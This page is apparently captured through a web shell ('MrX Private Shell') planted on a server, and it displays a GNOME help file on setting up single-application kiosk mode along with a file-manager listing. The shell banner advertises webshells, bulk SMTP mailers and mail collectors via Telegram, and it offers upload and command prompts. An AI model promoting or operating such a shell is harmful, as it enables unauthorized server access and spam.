__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<page xmlns="http://projectmallard.org/1.0/"
      xmlns:its="http://www.w3.org/2005/11/its"
      type="topic" style="task"
      id="lockdown-single-app-mode">

  <info>
    <link type="guide" xref="user-settings#lockdown"/>
    <link type="guide" xref="sundry#session"/>
    <link type="seealso" xref="lockdown-printing" />
    <link type="seealso" xref="lockdown-file-saving" />
    <link type="seealso" xref="lockdown-repartitioning" />
    <link type="seealso" xref="lockdown-command-line" />
    <link type="seealso" xref="login-automatic" />
    <link type="seealso" xref="session-custom" />
    <link type="seealso" xref="session-user" />

    <revision pkgversion="3.30" date="2019-02-08" status="review"/>

    <credit type="author copyright">
      <name>Matthias Clasen</name>
      <email>[email protected]</email>
      <years>2014</years>
    </credit>
    <credit type="editor">
      <name>Jana Svarova</name>
      <email>[email protected]</email>
        <years>2014</years>
    </credit>
    <credit type="editor">
      <name>Petr Kovar</name>
      <email>[email protected]</email>
      <years>2019</years>
    </credit>
    <credit type="author">
      <name>Marek Suchánek</name>
      <email>[email protected]</email>
      <years>2023</years>
    </credit>

    <include href="legal.xml" xmlns="http://www.w3.org/2001/XInclude"/>
       
    <desc>Set up a kiosk-like, single-application system.</desc>
  </info>

  <title>Configure single-application mode</title>

  <p>Single-application mode is a modified GNOME Shell which configures the
  Shell as an interactive kiosk. The administrator locks down some behavior to
  make the standard desktop more restrictive for users, letting them focus on
  selected features.</p>

  <p>Set up single-application mode for a wide range of functions in a number
  of fields (from communication to entertainment or education), and use it as a
  self-serve machine, event manager, registration point, and so on.</p>

  <note style="tip">
    <p>Your distribution might provide the
    <link href="https://gitlab.gnome.org/GNOME/gnome-kiosk">GNOME Kiosk</link>
    session, which is usually available in the gnome-kiosk package. You can use
    it to configure single-application mode more easily. Otherwise,
    use the following procedure.</p>
  </note>

  <steps>
  <title>Set up single-application mode</title>
    <item>
      <p>Lock down settings to prevent printing, terminal access, and so on.</p>
      <list type="disc">
        <item><p><link xref="lockdown-command-line" /></p></item>
        <item><p><link xref="lockdown-printing" /></p></item>
        <item><p><link xref="lockdown-file-saving" /></p></item>
        <item><p><link xref="lockdown-repartitioning" /></p></item>
      </list>
    </item>
    <item>
      <p>Configure automatic login in the <file>/etc/gdm/custom.conf</file>
      file for the user.</p>
      <p>See <link xref="login-automatic" /> for more information.</p>
    </item>
    <item>
      <p>Create the following files with the listed content:</p>
      <terms>
        <item>
          <title>
            <file>/usr/share/applications/org.gnome.Kiosk.Script.desktop</file>
          </title>
<code>
[Desktop Entry]
Name=Kiosk
Type=Application
Exec=gnome-kiosk
</code>
        </item>
        <item>
          <title>
            <file>/usr/share/applications/org.gnome.Kiosk.WindowManager.desktop</file>
          </title>
<code>
[Desktop Entry]
Type=Application
Name=Mutter
Comment=Window manager
Exec=/usr/bin/mutter
Categories=GNOME;GTK;Core;
OnlyShowIn=GNOME;
NoDisplay=true
X-GNOME-Autostart-Phase=DisplayServer
X-GNOME-Provides=windowmanager;
X-GNOME-Autostart-Notify=true
X-GNOME-AutoRestart=false
X-GNOME-HiddenUnderSystemd=true
</code>
        </item>
        <item>
          <title>
            <file>/usr/share/gnome-session/sessions/gnome-kiosk.session</file>
          </title>
<code>
[GNOME Session]
Name=Kiosk
RequiredComponents=org.gnome.Kiosk.WindowManager;org.gnome.Kiosk.Script;
</code>
        </item>
        <item>
          <title>
            <file>/usr/share/X11/xorg.conf.d/20-gnome-kiosk.conf</file>
          </title>
<code>
Section "ServerFlags"
    Option "DontVTSwitch" "on"
EndSection
</code>
        </item>
        <item>
          <title>
            <file>/usr/share/xsessions/org.gnome.Kiosk.desktop</file>
          </title>
<code>
[Desktop Entry]
Name=Kiosk
Comment=Kiosk mode
Exec=/usr/bin/gnome-session --session=gnome-kiosk
DesktopNames=GNOME-Kiosk;GNOME;
</code>
        </item>
      </terms>
    </item>
    <item>
      <p>As the user that will open the single-application session,
      create the <file>/home/<var>user</var>/.local/bin/gnome-kiosk</file> file:</p>
<code>
[<var>user</var>]$ mkdir -p ~/.local/bin

[<var>user</var>]$ touch ~/.local/bin/gnome-kiosk
</code>
    </item>
    <item>
      <p>Edit the <file>/home/<var>user</var>/.local/bin/gnome-kiosk</file> file and enter
      the executable name of the application that you want to launch in single-application mode.</p>
      <p>For example, to launch the Firefox browser in single-application mode,
      enter the following content:</p>
<code>
#!/bin/sh

while true; do
    firefox --kiosk https://example.org
done
</code>
      <p>The <code>while true</code> loop ensures that the application restarts
      if it terminates for any reason.</p>
    </item>
    <item>
      <p>Make the file executable:</p>
<code>
[<var>user</var>]$ chmod +x ~/.local/bin/gnome-kiosk
</code>
    </item>
    <item>
      <p>If you created the file or its containing directories as a different
      user than the single-application user, such as root, ensure that the file
      has the correct permissions:</p>
<code>
# chown -R <var>user</var>:<var>group</var> ~<var>user</var>/.local
</code>
    </item>
    <item>
      <p>At the GNOME login screen, select the Kiosk session from the gear
      button menu and log in as the single-application user.</p>
    </item>
  </steps>

</page>

Filemanager

Name Type Size Permission Actions
appearance.page File 538 B 0644
autostart-applications.page File 1.88 KB 0644
backgrounds-extra.page File 4.6 KB 0644
dconf-custom-defaults.page File 4.03 KB 0644
dconf-keyfiles.page File 3.09 KB 0644
dconf-lockdown.page File 3 KB 0644
dconf-nfs-home.page File 2.97 KB 0644
dconf-profiles.page File 3.99 KB 0644
dconf-snippets.xml File 1.62 KB 0644
dconf.page File 2.02 KB 0644
desktop-background.page File 3.75 KB 0644
desktop-favorite-applications.page File 4.34 KB 0644
desktop-lockscreen.page File 3.02 KB 0644
desktop-shield.page File 2.91 KB 0644
extensions-enable.page File 2.44 KB 0644
extensions-lockdown.page File 3.36 KB 0644
extensions.page File 1.82 KB 0644
fonts-user.page File 1.7 KB 0644
fonts.page File 2.53 KB 0644
gsettings-browse.page File 2.65 KB 0644
index.page File 593 B 0644
keyboard-compose-key.page File 2.43 KB 0644
keyboard-layout.page File 3.93 KB 0644
legal.xml File 295 B 0644
lockdown-command-line.page File 4.74 KB 0644
lockdown-file-saving.page File 2.8 KB 0644
lockdown-logout.page File 2.46 KB 0644
lockdown-online-accounts.page File 3.34 KB 0644
lockdown-printing.page File 2.74 KB 0644
lockdown-repartitioning.page File 2.92 KB 0644
lockdown-single-app-mode.page File 5.87 KB 0644
login-automatic.page File 2.59 KB 0644
login-banner.page File 2.59 KB 0644
login-enterprise.page File 4.66 KB 0644
login-fingerprint.page File 2.74 KB 0644
login-logo.page File 3.21 KB 0644
login-userlist-disable.page File 1.84 KB 0644
login.page File 687 B 0644
logout-automatic.page File 4.58 KB 0644
mime-types-application-user.page File 4.04 KB 0644
mime-types-application.page File 4.23 KB 0644
mime-types-custom-user.page File 4.03 KB 0644
mime-types-custom.page File 4.06 KB 0644
mime-types.page File 3.85 KB 0644
network-server-list.page File 2.2 KB 0644
network-vpn.page File 1.6 KB 0644
network.page File 431 B 0644
overrides.page File 1.74 KB 0644
power-dim-screen.page File 3.46 KB 0644
processes.page File 4.54 KB 0644
session-custom.page File 3.58 KB 0644
session-debug.page File 2.22 KB 0644
session-user.page File 3.05 KB 0644
setup.page File 318 B 0644
software.page File 795 B 0644
sundry.page File 387 B 0644
user-settings.page File 870 B 0644
Filemanager